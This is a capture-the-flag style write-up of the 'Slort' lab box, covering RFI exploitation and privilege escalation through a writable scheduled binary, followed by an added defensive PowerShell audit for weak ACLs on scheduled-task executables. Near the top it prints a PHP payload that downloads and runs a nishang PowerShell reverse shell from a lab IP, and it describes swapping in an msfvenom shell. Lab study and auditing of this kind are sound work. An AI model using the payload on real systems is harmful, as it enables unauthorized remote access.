PG Slort
I enumerate FileZilla and MySQL first. That FTP version has no remote execution vulnerability. MySQL won't let me connect. I believe there is a program called sqsh that can circumvent that issue. However, I move on.
Ports 4443 and 8080 host the same website. An RFI vulnerability exists.
I get stuck here. Multiple reverse shells do not work. I use nishang and that works. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1. Command: <?php system("powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.49.232/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.49.232 -Port 443")?>
Priv Esc
I get stuck here for hours and hours. I use plink.exe to get to MySQL. Nothing. I use winPEAS. Nothing. Sherlock. Nothing. PowerUp. Kernel exploits. Nothing. Stuff is there, but for Edge. I use local_exploit_suggester on metasploit. Nothing. I see a C:\Backup folder, walk in, and walk out. Which is the problem. The priv esc was right there.
I used a hint and it said "go to backups". Then I thought to replace the TFP.EXE with my already existing msfvenom shell.exe I gave to rupert. It works.
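The priv esc above works because a binary that a background process runs on a schedule sat in a folder a low-privileged user could write to. As an added example (not part of this write-up or of the PG box), the following PowerShell audit lists every executable referenced by an enabled scheduled task and reports ACL entries that let someone outside a trusted set of principals rewrite or replace it. The trusted-principal list and the write-rights mask are assumptions to adjust per environment; run it elevated so all tasks are visible.

```powershell
# Added audit example (not from the original write-up): flag scheduled-task executables
# that a non-administrative principal can modify or replace.
# Assumes Windows PowerShell 5.1+ with the ScheduledTasks module (Get-ScheduledTask).

# Assumed list of principals that may legitimately write to system binaries; everything else is flagged.
$trustedPrincipals = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller'
)

# Rights that allow rewriting the file, deleting it, or dropping a replacement into its folder.
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::Delete

function Get-WeakAclEntries {
    param([string]$Path)
    $acl = Get-Acl -Path $Path -ErrorAction Stop
    # Keep only Allow entries with a write-capable right held by an untrusted principal.
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.FileSystemRights -band $writeMask) -ne 0 -and
        $trustedPrincipals -notcontains $_.IdentityReference.Value
    }
}

Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        # Only Exec actions carry an executable path; COM-handler actions are skipped.
        if (-not $action.Execute) { continue }
        # Expand %SystemRoot%-style variables and strip surrounding quotes.
        $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        # Check the binary and its parent directory: a writable folder lets the file be
        # deleted and replaced even when the file's own ACL is tight.
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            foreach ($entry in Get-WeakAclEntries -Path $target) {
                [PSCustomObject]@{
                    Task      = "$($task.TaskPath)$($task.TaskName)"
                    RunsAs    = $task.Principal.UserId
                    Target    = $target
                    Principal = $entry.IdentityReference.Value
                    Rights    = $entry.FileSystemRights
                }
            }
        }
    }
} | Format-Table -AutoSize
```

Any row where RunsAs is a privileged account and Principal is an ordinary user or group such as BUILTIN\Users is the condition this box's priv esc relied on. The fix is to tighten the ACL on the binary and its folder (for example `icacls <path> /remove:g <principal>`) or to move the scheduled binary under a protected directory; a task that runs a file out of a folder like C:\Backups is the kind of out-of-place setup worth questioning as soon as it is seen.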
Questions
- Winpeas.exe binary download does not exist anymore. And I don't feel like compiling it with C#. Where to get this? Winpeas.bat, I don't like it. It's extremely slow and PowerShell does not like it. Keeping my ~2 year old winPEAS isn't a solution either.
- How to port forward more than one port with Plink
- Does a pspy32 exist for Windows. Where I would see this ~5 minute process. Instead of guessing something is happening in the background. Very easy on Linux, not sure for Windows
Lessons Learned
- Took me too long to think of RFI. Even if it's rare, try it anyway.
- C:\Backups is out of place.
- Accidentally remembered php:filters exist